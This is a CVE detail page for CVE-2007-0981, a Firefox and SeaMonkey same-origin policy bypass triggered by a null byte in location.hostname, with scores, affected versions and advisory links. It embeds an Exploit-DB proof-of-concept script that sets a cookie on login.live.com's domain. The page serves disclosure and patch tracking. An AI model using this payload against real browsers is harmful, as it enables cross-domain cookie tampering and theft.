CVE-2007-0981 : Detail

CVE-2007-0981

A01-Broken Access Control
35.02%V4
Network
2007-02-16
00h00 +00:00
2018-10-16
12h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Mozilla based browsers, including Firefox before 1.5.0.10 and 2.x before 2.0.0.2, and SeaMonkey before 1.0.8, allow remote attackers to bypass the same origin policy, steal cookies, and conduct other attacks by writing a URI with a null byte to the hostname (location.hostname) DOM property, due to interactions with DNS resolver code.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-264 Category : Permissions, Privileges, and Access Controls
Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 3340

Publication date : 2007-02-19 23h00 +00:00
Author : Michal Zalewski
EDB Verified : Yes

<!-- ________________________________________________________________________________ Mozilla Firefox 'location.hostname' Cross-Domain Vulnerability ________________________________________________________________________________ Software : Mozilla Firefox version 2.0.0.1 and prior CVE reference : CVE-2007-0981 Impact : Security Bypass Risk : Moderate Discovered by : Michal Zalewski (http://lcamtuf.coredump.cx/) Advisory Date : 2007-02-15 Mozilla Firefox allows remote attackers to bypass the same origin policy, steal cookies, and conduct other attacks by writing a URI with a null byte to the hostname (location.hostname) DOM property, due to interactions with DNS resolver code. Links http://lcamtuf.dione.cc/ffhostname.html (test) https://bugzilla.mozilla.org/show_bug.cgi?id=370445 ________________________________________________________________________________ How To Test Your Browser ? 1 - Execute this on your local web server (or change variable 'mydomain') 2 - Go to the link 'http://login.live.com/' and read the login (or check Tools -> Options -> Privacy -> Show Cookies for login.live.com) ________________________________________________________________________________ Gorn, gorn.support[gmail]com 2007-02-19 16:00 --> <script language="javascript"> var mydomain = '127.0.0.1'; var var_cook = 'MSPPre=firefox_vulnerability_test'; var dom_cook = 'login.live.com'; if (location.hostname == mydomain) { try { location.hostname = mydomain + '\x00www.' + dom_cook; } catch (err) { alert('Failed to modify location.hostname'); } } else { document.cookie = var_cook + '; domain=.' + dom_cook + '; path=/;'; } </script> # milw0rm.com [2007-02-20]

Products Mentioned

Configuraton 0

Mozilla>>Firefox >> Version To (including) 1.5.0.9

Mozilla>>Firefox >> Version 0.8

Mozilla>>Firefox >> Version 0.9

Mozilla>>Firefox >> Version 0.9

Mozilla>>Firefox >> Version 0.9.1

Mozilla>>Firefox >> Version 0.9.2

Mozilla>>Firefox >> Version 0.9.3

Mozilla>>Firefox >> Version 0.10

Mozilla>>Firefox >> Version 0.10.1

Mozilla>>Firefox >> Version 1.0

Mozilla>>Firefox >> Version 1.0.1

Mozilla>>Firefox >> Version 1.0.2

Mozilla>>Firefox >> Version 1.0.3

Mozilla>>Firefox >> Version 1.0.4

Mozilla>>Firefox >> Version 1.0.5

Mozilla>>Firefox >> Version 1.0.6

Mozilla>>Firefox >> Version 1.0.6

    Mozilla>>Firefox >> Version 1.0.7

    Mozilla>>Firefox >> Version 1.0.8

    Mozilla>>Firefox >> Version 1.5

    Mozilla>>Firefox >> Version 1.5

    Mozilla>>Firefox >> Version 1.5

    Mozilla>>Firefox >> Version 1.5.0.1

    Mozilla>>Firefox >> Version 1.5.0.2

    Mozilla>>Firefox >> Version 1.5.0.3

    Mozilla>>Firefox >> Version 1.5.0.4

    Mozilla>>Firefox >> Version 1.5.0.5

    Mozilla>>Firefox >> Version 1.5.0.6

    Mozilla>>Firefox >> Version 1.5.0.7

    Mozilla>>Firefox >> Version 1.5.0.8

    Mozilla>>Firefox >> Version 1.5.1

    Mozilla>>Firefox >> Version 1.5.2

    Mozilla>>Firefox >> Version 1.5.3

    Mozilla>>Firefox >> Version 1.5.4

    Mozilla>>Firefox >> Version 1.5.5

    Mozilla>>Firefox >> Version 1.5.6

    Mozilla>>Firefox >> Version 1.5.7

    Mozilla>>Firefox >> Version 1.5.8

    Mozilla>>Firefox >> Version 2.0

    Mozilla>>Firefox >> Version 2.0

      Mozilla>>Firefox >> Version 2.0

        Mozilla>>Firefox >> Version 2.0.0.1

        Mozilla>>Firefox >> Version preview_release

          Mozilla>>Seamonkey >> Version To (including) 1.0.7

          Mozilla>>Seamonkey >> Version 1.0

          Mozilla>>Seamonkey >> Version 1.0.1

          Mozilla>>Seamonkey >> Version 1.0.2

          Mozilla>>Seamonkey >> Version 1.0.3

          Mozilla>>Seamonkey >> Version 1.0.4

          Mozilla>>Seamonkey >> Version 1.0.5

          Mozilla>>Seamonkey >> Version 1.0.6

          References

          http://www.redhat.com/support/errata/RHSA-2007-0078.html
          Tags : vendor-advisory, x_refsource_REDHAT
          http://secunia.com/advisories/24395
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.osvdb.org/32104
          Tags : vdb-entry, x_refsource_OSVDB
          http://secunia.com/advisories/24328
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.redhat.com/support/errata/RHSA-2007-0108.html
          Tags : vendor-advisory, x_refsource_REDHAT
          http://security.gentoo.org/glsa/glsa-200703-04.xml
          Tags : vendor-advisory, x_refsource_GENTOO
          http://www.gentoo.org/security/en/glsa/glsa-200703-08.xml
          Tags : vendor-advisory, x_refsource_GENTOO
          http://secunia.com/advisories/24384
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/24457
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/24343
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.debian.org/security/2007/dsa-1336
          Tags : vendor-advisory, x_refsource_DEBIAN
          http://www.vupen.com/english/advisories/2007/0718
          Tags : vdb-entry, x_refsource_VUPEN
          http://www.kb.cert.org/vuls/id/885753
          Tags : third-party-advisory, x_refsource_CERT-VN
          http://secunia.com/advisories/24650
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.ubuntu.com/usn/usn-428-1
          Tags : vendor-advisory, x_refsource_UBUNTU
          http://securityreason.com/securityalert/2262
          Tags : third-party-advisory, x_refsource_SREASON
          http://secunia.com/advisories/24320
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/25588
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.vupen.com/english/advisories/2008/0083
          Tags : vdb-entry, x_refsource_VUPEN
          http://secunia.com/advisories/24293
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/24238
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/24393
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/24342
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/24287
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://fedoranews.org/cms/node/2713
          Tags : vendor-advisory, x_refsource_FEDORA
          http://secunia.com/advisories/24175
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.securityfocus.com/bid/22566
          Tags : vdb-entry, x_refsource_BID
          http://www.redhat.com/support/errata/RHSA-2007-0097.html
          Tags : vendor-advisory, x_refsource_REDHAT
          http://fedoranews.org/cms/node/2728
          Tags : vendor-advisory, x_refsource_FEDORA
          http://secunia.com/advisories/24205
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/24333
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.mandriva.com/security/advisories?name=MDKSA-2007:050
          Tags : vendor-advisory, x_refsource_MANDRIVA
          http://secunia.com/advisories/24290
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://securitytracker.com/id?1017654
          Tags : vdb-entry, x_refsource_SECTRACK
          http://secunia.com/advisories/24455
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://rhn.redhat.com/errata/RHSA-2007-0077.html
          Tags : vendor-advisory, x_refsource_REDHAT
          http://www.vupen.com/english/advisories/2007/0624
          Tags : vdb-entry, x_refsource_VUPEN
          http://www.redhat.com/support/errata/RHSA-2007-0079.html
          Tags : vendor-advisory, x_refsource_REDHAT
          http://secunia.com/advisories/24437
          Tags : third-party-advisory, x_refsource_SECUNIA
          The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.